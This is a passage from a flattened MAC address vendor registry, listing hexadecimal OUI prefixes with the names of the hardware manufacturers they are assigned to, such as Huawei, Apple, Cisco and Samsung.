Computer Inc. C80AA9 Quanta Computer Inc. 60EB69 Quanta Computer Inc. 58B623 Beijing Xiaomi Mobile Software Co., Ltd 00927D Ficosa Internationa(Taicang) C0.,Ltd. 441622 Microsoft Corporation 044562 ANDRA Sp. z o. o. 74F7F6 Shanghai Sunmi Technology Co.,Ltd. 94AEF0 Cisco Systems, Inc 44E6B0 China Mobile IOT Company Limited 747A90 Murata Manufacturing Co., Ltd. A022DE vivo Mobile Communication Co., Ltd. FC73FB HUAWEI TECHNOLOGIES CO.,LTD 14007D zte corporation 24E9CA Huawei Device Co., Ltd. 241AE6 Huawei Device Co., Ltd. 60B76E Google, Inc. 703AA6 New H3C Technologies Co., Ltd 8CCEFD Shenzhen zhouhai technology co.,LTD 50FB19 CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. 9408C7 Huawei Device Co., Ltd. BCA993 Cambium Networks Limited A497B1 CHONGQING FUGUI ELECTRONICS CO.,LTD. D440D0 OCOSMOS Co., LTD DCD9AE Nokia Shanghai Bell Co., Ltd. C4366C LG Innotek 1C08C1 LG Innotek 903FEA HUAWEI TECHNOLOGIES CO.,LTD 20AB48 HUAWEI TECHNOLOGIES CO.,LTD CCD73C HUAWEI TECHNOLOGIES CO.,LTD C8CA63 Huawei Device Co., Ltd. 9437F7 Huawei Device Co., Ltd. D0C637 Intel Corporate D49234 NEC Corporation 10746F MOTOROLA SOLUTIONS MALAYSIA SDN. BHD. 94E70B Intel Corporate 046C59 Intel Corporate 98B8BC Samsung Electronics Co.,Ltd 184E16 Samsung Electronics Co.,Ltd C03D03 Samsung Electronics Co.,Ltd D4ABCD Hui Zhou Gaoshengda Technology Co.,LTD 58FDB1 LG Electronics A0CAA5 INTELLIGENCE TECHNOLOGY OF CEC CO., LTD E8854B Apple, Inc. 386893 Intel Corporate 6CDEA9 Cisco Meraki A8469D Cisco Meraki E00EE4 DWnet Technologies(Suzhou) Corporation 3C306F HUAWEI TECHNOLOGIES CO.,LTD 80E1BF HUAWEI TECHNOLOGIES CO.,LTD 482CD0 HUAWEI TECHNOLOGIES CO.,LTD 34EAE7 Shanghai High-Flying Electronics Technology Co., Ltd CC9ECA HMD Global Oy 28EC95 Apple, Inc. E02B96 Apple, Inc. 08AA55 Motorola Mobility LLC, a Lenovo Company 709F2D zte corporation 5C0FFB Amino Communications Ltd 3CF652 zte corporation E82A44 Liteon Technology Corporation 48E1E9 Chengdu Meross Technology Co., Ltd. 08B055 ASKEY COMPUTER CORP A0DE0F Huawei Device Co., Ltd. 184593 Taicang T&W Electronics F86C03 Shenzhen Teleone Technology Co., Ltd E43A65 MofiNetwork Inc 54219D Samsung Electronics Co.,Ltd A80577 Netlist, Inc. 105DDC Huawei Device Co., Ltd. DC7385 Huawei Device Co., Ltd. 5455D5 Huawei Device Co., Ltd. F041C6 Heat Tech Company, Ltd. C49886 Qorvo International Pte. Ltd. D8714D Texas Instruments 0CEC80 Texas Instruments 404028 ZIV C88BE8 Masimo Corporation 7CEF61 STR Elektronik Josef Schlechtinger GmbH 400589 T-Mobile, USA 2462CE Aruba, a Hewlett Packard Enterprise Company 64A965 Linkflow Co., Ltd. F487C5 Huawei Device Co., Ltd. 7458F3 Amazon Technologies Inc. 68E209 HUAWEI TECHNOLOGIES CO.,LTD F4308B Xiaomi Communications Co Ltd DC6B12 worldcns inc. 001354 Zcomax Technologies, Inc. 282373 Digita D0ABD5 Intel Corporate C09BF4 IEEE Registration Authority 30B237 GD Midea Air-Conditioning Equipment Co.,Ltd. BC5A56 Cisco Systems, Inc BC0F9A D-Link International 70039F Espressif Inc. D4C1C8 zte corporation 88D274 zte corporation 001977 Extreme Networks, Inc. 882B94 MADOKA SYSTEM Co.,Ltd. 4CB911 Raisecom Technology CO.,LTD AC4B1E Integri-Sys.Com LLC 6869CA Hitachi, Ltd. B0E4D5 Google, Inc. 0C35FE Fiberhome Telecommunication Technologies Co.,LTD 8C83DF Nokia 30B9B0 Intracom Asia Co., Ltd D4DACD SKY UK LIMITED F4B78D HUAWEI TECHNOLOGIES CO.,LTD A416E7 HUAWEI TECHNOLOGIES CO.,LTD B40931 HUAWEI TECHNOLOGIES CO.,LTD 94E7EA HUAWEI TECHNOLOGIES CO.,LTD 94E4BA Huawei Device Co., Ltd. 347146 Huawei Device Co., Ltd. 2CC546 Huawei Device Co., Ltd. 0C839A Huawei Device Co., Ltd. E0E0FC Huawei Device Co., Ltd. AC4A56 Cisco Systems, Inc B0B5C3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 4CCE2D Danlaw Inc 08EA44 Extreme Networks, Inc. F4EAB5 Extreme Networks, Inc. B87CF2 Extreme Networks, Inc. 704A0E AMPAK Technology,Inc. E0D4E8 Intel Corporate 305075 GN Audio A/S D45EEC Beijing Xiaomi Electronics Co., Ltd. 4C4576 China Mobile(Hangzhou) Information Technology Co.,Ltd. 74C929 Zhejiang Dahua Technology Co., Ltd. 94CC04 IEEE Registration Authority B440A4 Apple, Inc. 48B8A3 Apple, Inc. F4DBE3 Apple, Inc. BC428C ALPSALPINE CO,.LTD 9CC9EB NETGEAR 5CB29E ASCO Power Technologies 30809B New H3C Technologies Co., Ltd 88C397 Beijing Xiaomi Mobile Software Co., Ltd F0F6C1 Sonos, Inc. 90EC77 silicom 04BDBF Samsung Electronics Co.,Ltd BC7ABF Samsung Electronics Co.,Ltd 60684E Samsung Electronics Co.,Ltd 8020FD Samsung Electronics Co.,Ltd B4CE40 Samsung Electronics Co.,Ltd 30AB6A SAMSUNG ELECTRO-MECHANICS(THAILAND) 749BE8 Hitron Technologies. Inc 4C6371 Xiaomi Communications Co Ltd 64F2FB Hangzhou Ezviz Software Co.,Ltd. 6C0D34 Nokia 347839 zte corporation D84DB9 Wu Qi Technologies,Inc. A04F85 LG Electronics (Mobile Communications) F419E2 Volterra D807B6 TP-LINK TECHNOLOGIES CO.,LTD. 646E97 TP-LINK TECHNOLOGIES CO.,LTD. 6C1632 HUAWEI TECHNOLOGIES CO.,LTD 2C1A01 HUAWEI TECHNOLOGIES CO.,LTD 24169D Cisco Systems, Inc 00233D Laird Technologies 7422BB Huawei Device Co., Ltd. FC8E6E StreamCCTV, LLC 788B2A Zhen Shi Information Technology (Shanghai) Co., Ltd. AC64CF FN-LINK TECHNOLOGY LIMITED 5C17CF OnePlus Technology (Shenzhen) Co., Ltd 102959 Apple, Inc. E47684 Apple, Inc. F05CD5 Apple, Inc. 14F6D8 Intel Corporate 3CDA6D Tiandy Technologies CO.,LTD A4FA76 New H3C Technologies Co., Ltd 3CFAD3 IEEE Registration Authority 5CBAEF CHONGQING FUGUI ELECTRONICS CO.,LTD. 000ADB Trilliant 0445A1 NIRIT- Xinwei Telecom Technology Co., Ltd. 8020E1 BVBA DPTechnics B41A1D Samsung Electronics Co.,Ltd 8C6078 Swissbit AG F80DF0 zte corporation 9CE91C zte corporation 00DD25 Shenzhen hechengdong Technology Co., Ltd 70EA5A Apple, Inc. 9CE176 Cisco Systems, Inc 8C97EA FREEBOX SAS 4CE176 Cisco Systems, Inc 1434F6 LV SOLUTION SDN. BHD. 18AFA1 Shenzhen Yifang Network Technology Co., Ltd. 54CE69 Hikari Trading Co.,Ltd. 6CAEF6 eero inc. FCF5C4 Espressif Inc. 8C53C3 Beijing Xiaomi Mobile Software Co., Ltd D83BBF Intel Corporate 000DBB Nippon Dentsu Co.,Ltd. 0CEE99 Amazon Technologies Inc. F06728 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E02AE6 Fiberhome Telecommunication Technologies Co.,LTD E826B6 Companies House to GlucoRx Technologies Ltd. 00763D Veea C014B8 Nokia D028BA Realme Chongqing MobileTelecommunications Corp Ltd A428B7 Yangtze Memory Technologies Co., Ltd. 9492D2 KCF Technologies, Inc. E4A8DF COMPAL INFORMATION (KUNSHAN) CO., LTD. 702F35 HUAWEI TECHNOLOGIES CO.,LTD 48B02D NVIDIA Corporation 588E81 Silicon Laboratories 902B34 GIGA-BYTE TECHNOLOGY CO.,LTD. 94DE80 GIGA-BYTE TECHNOLOGY CO.,LTD. 74D435 GIGA-BYTE TECHNOLOGY CO.,LTD. 408D5C GIGA-BYTE TECHNOLOGY CO.,LTD. 6CC63B Taicang T&W Electronics 3093BC Sagemcom Broadband SAS F4FEFB Samsung Electronics Co.,Ltd 0027E3 Cisco Systems, Inc 089C86 Nokia Shanghai Bell Co., Ltd. F05136 TCT mobile ltd 105932 Roku, Inc 043F72 Mellanox Technologies, Inc. F86FDE Shenzhen Goodix Technology Co.,Ltd. 0045E2 CyberTAN Technology Inc. 006967 IEEE Registration Authority 3C410E Cisco Systems, Inc 207454 vivo Mobile Communication Co., Ltd. B8C9B5 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 984914 Wistron Neweb Corporation 502CC6 GREE ELECTRIC APPLIANCES, INC. OF ZHUHAI 001EB8 Aloys, Inc 001FF6 PS Audio International 1C4D66 Amazon Technologies Inc. 646624 Sagemcom Broadband SAS B0F530 Hitron Technologies. Inc 0CE4A0 Huawei Device Co., Ltd. 90FD73 zte corporation 88ACC0 Zyxel Communications Corporation 1C1E38 PCCW Global, Inc. BC1AE4 Huawei Device Co., Ltd. 740AE1 Huawei Device Co., Ltd. B4A898 Huawei Device Co., Ltd. 34CB1A Procter & Gamble Company EC9C32 Sichuan AI-Link Technology Co., Ltd. 1C1ADF Microsoft Corporation D4F547 Google, Inc. D42DC5 i-PRO Co., Ltd. F0B107 Ericsson AB E8D03C Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 783A6C TECNO MOBILE LIMITED 981BB5 ASSA ABLOY Korea Co., Ltd iRevo F072EA Google, Inc. 90AFD1 netKTI Co., Ltd 7817BE HUAWEI TECHNOLOGIES CO.,LTD E04007 Huawei Device Co., Ltd. 70CE8C Samsung Electronics Co.,Ltd B87BC5 Apple, Inc. 4070F5 Apple, Inc. B035B5 Apple, Inc. 800C67 Apple, Inc. 90812A Apple, Inc. C43A35 FN-LINK TECHNOLOGY LIMITED 04D16E IEEE Registration Authority F03F95 HUAWEI TECHNOLOGIES CO.,LTD 185644 HUAWEI TECHNOLOGIES CO.,LTD C4E0DE Zhengzhou XindaJiean Information Technology Co.,Ltd. 901A4F EM Microelectronic 0004C9 Micro Electron Co., Ltd. C84F0E Integrated Device Technology (Malaysia) Sdn. Bhd. 10E953 Huawei Device Co., Ltd. D88ADC Huawei Device Co., Ltd. CC6A10 The Chamberlain Group, Inc 6CD2BA zte corporation 303ABA Guangzhou BaoLun Electronics Co., Ltd 6C1C71 Zhejiang Dahua Technology Co., Ltd. 0C2FB0 Samsung Electronics Co.,Ltd 4CADA8 PANOPTICS CORP. B887C6 Prudential Technology co.,LTD FC1CA1 Nokia 54A493 IEEE Registration Authority 8CC84B CHONGQING FUGUI ELECTRONICS CO.,LTD. 7C48B2 Vida Resources Lte Ltd 9C69D1 HUAWEI TECHNOLOGIES CO.,LTD 040E3C HP Inc. 002272 American Micro-Fuel Device Corp. 00D0EF IGT D89790 Commonwealth Scientific and Industrial Research Organisation D44F68 Eidetic Communications Inc 340F66 Web Sensing LLC 78C881 Sony Interactive Entertainment Inc. 18E1CA wanze CCEF03 Hunan Keyshare Communication Technology Co., Ltd. 7048F7 Nintendo Co.,Ltd ECBEDD Sagemcom Broadband SAS 88571D Seongji Industry Company B04FC3 Shenzhen NVC Cloud Technology Co., Ltd. 7CF31B LG Electronics (Mobile Communications) 10327E Huawei Device Co., Ltd. C419D1 Telink Semiconductor (Shanghai) Co., Ltd. B40216 Cisco Systems, Inc 086083 zte corporation E01954 zte corporation 309176 Skyworth Digital Technology(Shenzhen) Co.,Ltd 749EA5 OHSUNG B065F1 WIO Manufacturing HK Limited 901234 Shenzhen YOUHUA Technology Co., Ltd 542A1B Sonos, Inc. 38C4E8 NSS Sp. z o.o. 34DD7E Umeox Innovations Co.,Ltd CCCD64 SM-Electronic GmbH 24DFA7 Hangzhou BroadLink Technology Co.,Ltd 5C925E Zioncom Electronics (Shenzhen) Ltd. 64B21D Chengdu Phycom Tech Co., Ltd. 1802AE vivo Mobile Communication Co., Ltd. 0C20D3 vivo Mobile Communication Co., Ltd. C42996 Signify B.V. 5098B8 New H3C Technologies Co., Ltd BC2392 BYD Precision Manufacture Company Ltd. 94E6F7 Intel Corporate 405582 Nokia A4E31B Nokia B8A58D Axe Group Holdings Limited 50CEE3 Gigafirm.co.LTD 883A30 Aruba, a Hewlett Packard Enterprise Company F4BD9E Cisco Systems, Inc 5885E9 Realme Chongqing MobileTelecommunications Corp Ltd 4C1D96 Intel Corporate 887E25 Extreme Networks, Inc. 44D791 HUAWEI TECHNOLOGIES CO.,LTD F8084F Sagemcom Broadband SAS F497C2 Nebulon Inc A44519 Xiaomi Communications Co Ltd 8446FE HUAWEI TECHNOLOGIES CO.,LTD D82918 HUAWEI TECHNOLOGIES CO.,LTD 30FBB8 HUAWEI TECHNOLOGIES CO.,LTD 68DBF5 Amazon Technologies Inc. 2446C8 Motorola Mobility LLC, a Lenovo Company 084FA9 Cisco Systems, Inc 084FF9 Cisco Systems, Inc 980637 IEEE Registration Authority 8CB84A SAMSUNG ELECTRO-MECHANICS(THAILAND) 98E8FA Nintendo Co.,Ltd A89352 SHANGHAI ZHONGMI COMMUNICATION TECHNOLOGY CO.,LTD 308BB2 Cisco Systems, Inc E4CC9D Integrated Device Technology (Malaysia) Sdn. Bhd. A8D0E3 Systech Electronics Ltd 6CE8C6 Earda Technologies co Ltd 1C4176 China Mobile Group Device Co.,Ltd. 48216C China Mobile IOT Company Limited 8CBE24 Tashang Semiconductor(Shanghai) Co., Ltd. B84DEE Hisense broadband multimedia technology Co.,Ltd D46BA6 HUAWEI TECHNOLOGIES CO.,LTD CC0577 HUAWEI TECHNOLOGIES CO.,LTD 98BA39 Doro AB E0EB62 Shanghai Hulu Devices Co., Ltd 608B0E Apple, Inc. A4AE11 Hon Hai Precision Industry Co., Ltd. 2C1E4F Chengdu Qianli Network Technology Co., Ltd. 009052 SELCOM ELETTRONICA S.R.L. 001A83 Pegasus Technologies Inc. 94DC4E AEV, spol. s r. o. 54DED0 Sevio Srl 1871D5 Hazens Automotive Electronics(SZ)Co.,Ltd. ACB1EE SHENZHEN FENDA TECHNOLOGY CO., LTD F8ADCB HMD Global Oy D462EA HUAWEI TECHNOLOGIES CO.,LTD 54BAD6 HUAWEI TECHNOLOGIES CO.,LTD 6C5E3B Cisco Systems, Inc 1442FC Texas Instruments AC5D5C FN-LINK TECHNOLOGY LIMITED E86F38 CHONGQING FUGUI ELECTRONICS CO.,LTD. 08B3AF vivo Mobile Communication Co., Ltd. 30862D Arista Network, Inc. 08688D New H3C Technologies Co., Ltd 401920 Movon Corporation BC97E1 Broadcom Limited 28D1B7 Shenzhen YOUHUA Technology Co., Ltd 88299C Samsung Electronics Co.,Ltd 7C8956 Samsung Electronics Co.,Ltd 24166D HUAWEI TECHNOLOGIES CO.,LTD 940B19 HUAWEI TECHNOLOGIES CO.,LTD 70C7F2 HUAWEI TECHNOLOGIES CO.,LTD DCA632 Raspberry Pi Trading Ltd 88F56E HUAWEI TECHNOLOGIES CO.,LTD 3894ED NETGEAR 0CB771 ARRIS Group, Inc. 50E085 Intel Corporate D03745 TP-LINK TECHNOLOGIES CO.,LTD. 603A7C TP-LINK TECHNOLOGIES CO.,LTD. 000178 MARGI Systems, Inc. 58C876 China Mobile (Hangzhou) Information Technology Co., Ltd. 700433 California Things Inc. C8C2FA HUAWEI TECHNOLOGIES CO.,LTD 88B362 Nokia Shanghai Bell Co., Ltd. 0847D0 Nokia Shanghai Bell Co., Ltd. CC9093 Hansong Tehnologies CC64A6 HUAWEI TECHNOLOGIES CO.,LTD EC5B73 Advanced & Wise Technology Corp. 14C03E ARRIS Group, Inc. C089AB ARRIS Group, Inc. D44DA4 Murata Manufacturing Co., Ltd. 08EDED Zhejiang Dahua Technology Co., Ltd. 201742 LG Electronics CC8826 LG Innotek 148430 MITAC COMPUTING TECHNOLOGY CORPORATION B8A44F Axis Communications AB 0024EB ClearPath Networks, Inc. D81399 Hui Zhou Gaoshengda Technology Co.,LTD 30317D Hosiden Corporation F0A968 Antailiye Technology Co.,Ltd 742EDB Perinet GmbH 848BCD IEEE Registration Authority 54E019 Ring LLC 5CFAFB Acubit 50AF4D zte corporation C8EAF8 zte corporation 9C7BEF Hewlett Packard 383B26 Jiangsu Qinheng Co., Ltd. 00A0B0 I-O DATA DEVICE,INC. 88F872 HUAWEI TECHNOLOGIES CO.,LTD EC5623 HUAWEI TECHNOLOGIES CO.,LTD 5486BC Cisco Systems, Inc 402343 CHONGQING FUGUI ELECTRONICS CO.,LTD. 0021B7 LEXMARK INTERNATIONAL, INC. 6092F5 ARRIS Group, Inc. 0022AF Safety Vision, LLC A091A2 OnePlus Electronics (Shenzhen) Co., Ltd. 8020DA Sagemcom Broadband SAS D09C7A Xiaomi Communications Co Ltd 1C697A EliteGroup Computer Systems Co., LTD 4C1744 Amazon Technologies Inc. DC7196 Intel Corporate 6882F2 grandcentrix GmbH D420B0 Mist Systems, Inc. B03055 China Mobile IOT Company Limited 905C34 Sirius Electronic Systems Srl D46A35 Cisco Systems, Inc 003085 Cisco Systems, Inc F8E5CF CGI IT UK LIMITED 0080B5 UNITED NETWORKS INC. B808CF Intel Corporate 68847E FUJITSU LIMITED F89A78 HUAWEI TECHNOLOGIES CO.,LTD C82C2B IEEE Registration Authority 9C497F Integrated Device Technology (Malaysia) Sdn. Bhd. C4E39F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 2479F3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 80A235 Edgecore Networks Corporation C8C64A Flextronics Tech.(Ind) Pvt Ltd 30EA26 Sycada BV 108286 Luxshare Precision Industry Co.,Ltd 6063F9 Ciholas, Inc. AC8FF8 Nokia 6003A6 Inteno Broadband Technology AB 44B295 Sichuan AI-Link Technology Co., Ltd. 80DA13 eero inc. 605F8D eero inc. C4B36A Cisco Systems, Inc 70F754 AMPAK Technology,Inc. 6C8BD3 Cisco Systems, Inc 68974B Shenzhen Costar Electronics Co. Ltd. 34E1D1 IEEE Registration Authority 246F28 Espressif Inc. 6061DF Z-meta Research LLC 7057BF New H3C Technologies Co., Ltd 089798 COMPAL INFORMATION (KUNSHAN) CO., LTD. 14B457 Silicon Laboratories DC962C NST Audio Ltd 50EC50 Beijing Xiaomi Mobile Software Co., Ltd 48F8DB HUAWEI TECHNOLOGIES CO.,LTD 18022D HUAWEI TECHNOLOGIES CO.,LTD D8BC59 Shenzhen DAPU Microelectronics Co., Ltd 8C79F5 Samsung Electronics Co.,Ltd 18F18E ChipER Technology co. ltd 000422 Studio Technologies, Inc 9424E1 Alcatel-Lucent Enterprise 88B291 Apple, Inc. C42AD0 Apple, Inc. CCD281 Apple, Inc. 00122A VTech Telecommunications Ltd. B0518E Holl technology CO.Ltd. 681729 Intel Corporate 2852E0 Layon international Electronic & Telecom Co.,Ltd 58CB52 Google, Inc. 200DB0 Shenzhen Four Seas Global Link Network Technology Co., Ltd. C08ACD Guangzhou Shiyuan Electronic Technology Company Limited D81EDD GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D43FCB ARRIS Group, Inc. 107717 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD A86D5F Raisecom Technology CO., LTD 7C6166 Amazon Technologies Inc. 989BCB AVM Audiovisuelles Marketing und Computersysteme GmbH F8CA59 NetComm Wireless F84D33 Fiberhome Telecommunication Technologies Co.,LTD ACF6F7 LG Electronics (Mobile Communications) 907A58 Zegna-Daidong Limited E009BF SHENZHEN TONG BO WEI TECHNOLOGY Co.,LTD 846991 Nokia 00131E peiker acustic GmbH 783607 Cermate Technologies Inc. B00073 Wistron Neweb Corporation 001BF7 Lund IP Products AB 48E6C0 SIMCom Wireless Solutions Co.,Ltd. 383C9C Fujian Newland Payment Technology Co.,Ltd. C02E25 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 58ECED Integrated Device Technology (Malaysia) Sdn. Bhd. 100C6B NETGEAR C4F0EC Fiberhome Telecommunication Technologies Co.,LTD D88DC8 Atil Technology Co., LTD E80FC8 Universal Electronics, Inc. 0007CB FREEBOX SAS 149FB6 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 00115A Ivoclar Vivadent AG A43EA0 iComm HK LIMITED 64C2DE LG Electronics (Mobile Communications) 8C444F HUMAX Co., Ltd. 006762 Fiberhome Telecommunication Technologies Co.,LTD 00EEAB Cisco Systems, Inc 54A703 TP-LINK TECHNOLOGIES CO.,LTD. C8AACC Private 04EE03 Texas Instruments 4C2498 Texas Instruments 7CD95C Google, Inc. 4CAEA3 Hewlett Packard Enterprise 1C2E1B Suzhou Tremenet Communication Technology Co., Ltd. 002167 HWA JIN T&I Corp. 000B86 Aruba, a Hewlett Packard Enterprise Company D8C7C8 Aruba, a Hewlett Packard Enterprise Company 703A0E Aruba, a Hewlett Packard Enterprise Company 204C03 Aruba, a Hewlett Packard Enterprise Company A8E2C1 Texas Instruments 909A77 Texas Instruments 1C24EB Burlywood 001013 Kontron America, Inc. 2C2BF9 LG Innotek 2CC407 machineQ 40DF02 LINE BIZ Plus DC31D1 vivo Mobile Communication Co., Ltd. D43B04 Intel Corporate 900218 SKY UK LIMITED 144E2A Ciena Corporation B4ED19 Pie Digital, Inc. 84139F zte corporation 58C6F0 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 84A06E Sagemcom Broadband SAS 884A18 Opulinks 7495EC ALPSALPINE CO,.LTD AC5AEE China Mobile Group Device Co.,Ltd. F051EA Fitbit, Inc. 5033F0 YICHEN (SHENZHEN) TECHNOLOGY CO.LTD E09F2A Iton Technology Corp. 4CE19E TECNO MOBILE LIMITED 441AFA New H3C Technologies Co., Ltd 70BC10 Microsoft Corporation 500084 Siemens Canada FC2BB2 Actiontec Electronics, Inc 0006F7 ALPSALPINE CO,.LTD 000704 ALPSALPINE CO,.LTD 0006F5 ALPSALPINE CO,.LTD 34C731 ALPSALPINE CO,.LTD 64D4BD ALPSALPINE CO,.LTD 0498F3 ALPSALPINE CO,.LTD 00214F ALPSALPINE CO,.LTD 04072E VTech Electronics Ltd. 04EA56 Intel Corporate 9C69B4 IEEE Registration Authority 44B433 tide.co.,ltd D8A6FD Ghost Locomotion DC21B9 Sentec Co.Ltd 6CDFFB IEEE Registration Authority E498BB Phyplus Microelectronics Limited 60A11E Wuhan Maxsine Electric Co.,Ltd. 9454DF YST CORP. 7CBC84 IEEE Registration Authority 5C415A Amazon.com, LLC 705E55 Realme Chongqing MobileTelecommunications Corp Ltd B0D568 Shenzhen Cultraview Digital Technology Co., Ltd F00EBF ZettaHash Inc. 703509 Cisco Systems, Inc 247D4D Texas Instruments 780ED1 TRUMPF Werkzeugmaschinen GmbH+Co.KG F82F08 Molex CMS 203233 SHENZHEN BILIAN ELECTRONIC CO.,LTD A8B456 Cisco Systems, Inc A49426 Elgama-Elektronika Ltd. 6829DC Ficosa Electronics S.L.U. C45BF7 ants 8CDF9D NEC Corporation 2CA9F0 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 549B72 Ericsson AB A047D7 Best IT World (India) Pvt Ltd 6899CD Cisco Systems, Inc 1040F3 Apple, Inc. 44E66E Apple, Inc. C0E862 Apple, Inc. F40616 Apple, Inc. 586B14 Apple, Inc. BCB863 Apple, Inc. F80DF1 Sontex SA 4428A3 Jiangsu fulian Communication Technology Co., Ltd. 10C595 Lenovo 2C1CF6 Alien Green LLC 0CFE5D IEEE Registration Authority 3C8D20 Google, Inc. 601D91 Motorola Mobility LLC, a Lenovo Company D4C94B Motorola Mobility LLC, a Lenovo Company 08351B Shenzhen Jialihua Electronic Technology Co., Ltd AC1585 silergy corp AC5093 Magna Electronics Europe GmbH & Co. OHG 64F81C Huawei Technologies Co., Ltd. 70BBE9 Xiaomi Communications Co Ltd 00D02D Resideo D0B60A Xingluo Technology Company Limited 049226 ASUSTek COMPUTER INC. E8ADA6 Sagemcom Broadband SAS 50A0A4 Nokia 1098C3 Murata Manufacturing Co., Ltd. 10C753 Qingdao Intelligent&Precise Electronics Co.,Ltd. F4951B Hefei Radio Communication Technology Co., Ltd 6C3845 Fiberhome Telecommunication Technologies Co.,LTD 0C1C19 LONGCONN ELECTRONICS(SHENZHEN) CO.,LTD E013B5 vivo Mobile Communication Co., Ltd. E0795E Wuxi Xiaohu Technology Co.,Ltd. 2C6104 SHENZHEN FENGLIAN TECHNOLOGY CO., LTD. BC9325 Ningbo Joyson Preh Car Connect Co.,Ltd. 9CC8FC ARRIS Group, Inc. 806940 LEXAR CO.,LIMITED B07E11 Texas Instruments C89C13 Inspiremobile 0C4101 Ruichi Auto Technology (Guangzhou) Co., Ltd. 00B771 Cisco Systems, Inc 8C85E6 Cleondris GmbH 84326F GUANGZHOU AVA ELECTRONICS TECHNOLOGY CO.,LTD 2CCA0C WITHUS PLANET 440049 Amazon Technologies Inc. A4FC77 Mega Well Limited 90E710 New H3C Technologies Co., Ltd 302952 Hillstone Networks Inc 807D14 HUAWEI TECHNOLOGIES CO.,LTD 20283E HUAWEI TECHNOLOGIES CO.,LTD 00B1E3 Cisco Systems, Inc A41194 Lenovo 4C569D Apple, Inc. 38539C Apple, Inc. 402619 Apple, Inc. 6CE85C Apple, Inc. E4B2FB Apple, Inc. 049162 Microchip Technology Inc. F83880 Apple, Inc. D003DF Samsung Electronics Co.,Ltd 6CC374 Texas Instruments 684749 Texas Instruments F8D9B8 Open Mesh, Inc. 7C696B Atmosic Technologies 5CD20B Yytek Co., Ltd. 4C1265 ARRIS Group, Inc. 2C79D7 Sagemcom Broadband SAS 00B4F5 DongGuan Siyoto Electronics Co., Ltd BC3F4E Teleepoch Ltd 983B8F Intel Corporate 58B568 SECURITAS DIRECT ESPAÑA, SAU E86A64 LCFC(HeFei) Electronics Technology co., ltd 10A24E GOLD3LINK ELECTRONICS CO., LTD C423A2 PT. Emsonic Indonesia 1838AE CONSPIN SOLUTION 04CF8C XIAOMI Electronics,CO.,LTD 0C7512 Shenzhen Kunlun TongTai Technology Co.,Ltd. 54278D NXP (China) Management Ltd. B0BE76 TP-LINK TECHNOLOGIES CO.,LTD. 4C1B86 Arcadyan Corporation B0AE25 Varikorea 00500C e-Tek Labs, Inc. 485F99 Cloud Network Technology (Samoa) Limited 88F7BF vivo Mobile Communication Co., Ltd. D87D7F Sagemcom Broadband SAS 8834FE Bosch Automotive Products (Suzhou) Co. Ltd ECC40D Nintendo Co.,Ltd 50579C Seiko Epson Corporation 8489EC IEEE Registration Authority 18D717 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 80B624 IVS DCF505 AzureWave Technology Inc. CCF0FD China Mobile (Hangzhou) Information Technology Co., Ltd. 5CFB7C Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd FC039F Samsung Electronics Co.,Ltd 484AE9 Hewlett Packard Enterprise 846A66 Sumitomo Kizai Co.,Ltd. 1C1BB5 Intel Corporate D4741B Beijing HuaDa ZhiBao Electronic System Co.,Ltd. 0057C1 LG Electronics (Mobile Communications) 7C240C Telechips, Inc. 00203D Honeywell Environmental & Combustion Controls 004084 Honeywell B4CB57 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 00051A 3COM EUROPE LTD 08004E 3COM EUROPE LTD 00301E 3COM EUROPE LTD 005004 3COM 000103 3COM A0950C China Mobile IOT Company Limited 2C15E1 Phicomm (Shanghai) Co., Ltd. 02C08C 3COM 00073A INVENTEL 00266C INVENTEC CORPORATION 008CFA INVENTEC CORPORATION 88108F HUAWEI TECHNOLOGIES CO.,LTD F4631F HUAWEI TECHNOLOGIES CO.,LTD A49B4F HUAWEI TECHNOLOGIES CO.,LTD A4D990 Samsung Electronics Co.,Ltd 006087 KANSAI ELECTRIC CO., LTD. 98AE71 VVDN Technologies Pvt Ltd 30D16B Liteon Technology Corporation 0080EB COMPCONTROL B.V. 0002EB Pico Communications 68A8E1 Wacom Co.,Ltd. AC6E1A SHENZHEN GONGJIN ELECTRONICS CO.,LT 30D32D devolo AG BCF2AF devolo AG E0AF4F Deutsche Telekom AG B869F4 Routerboard.com 001555 DFM GmbH 342EB6 HUAWEI TECHNOLOGIES CO.,LTD AC9232 HUAWEI TECHNOLOGIES CO.,LTD DC8B28 Intel Corporate DCF719 Cisco Systems, Inc 000FB0 Compal Electronics INC. 00023F Compal Electronics INC. 305DA6 ADVALY SYSTEM Inc. BC30D9 Arcadyan Corporation 24D76B Syntronic AB 0479B7 Texas Instruments C0D0FF China Mobile IOT Company Limited 88DF9E New H3C Technologies Co., Ltd 2C7CE4 Wuhan Tianyu Information Industry Co., Ltd. FC4AE9 Castlenet Technology Inc. 40313C XIAOMI Electronics,CO.,LTD 283A4D Cloud Network Technology (Samoa) Limited B87C6F NXP (China) Management Ltd. C4FEE2 AMICCOM Electronics Corporation 144802 THE YEOLRIM Co.,Ltd. 84C9C6 SHENZHEN GONGJIN ELECTRONICS CO.,LT 780CF0 Cisco Systems, Inc 0C8C24 SHENZHEN BILIAN ELECTRONIC CO.,LTD E01283 Shenzhen Fanzhuo Communication Technology Co., Lt 1C7508 COMPAL INFORMATION (KUNSHAN) CO., LTD. 001B38 COMPAL INFORMATION (KUNSHAN) CO., LTD. 00235A COMPAL INFORMATION (KUNSHAN) CO., LTD. FC4596 COMPAL INFORMATION (KUNSHAN) CO., LTD. A0E534 Stratec Biomedical AG 444B5D GE Healthcare 8CA048 Beijing NeTopChip Technology Co.,LTD 24D3F2 zte corporation D469A5 Miura Systems Ltd. 88B66B easynetworks 7C96D2 Fihonest communication 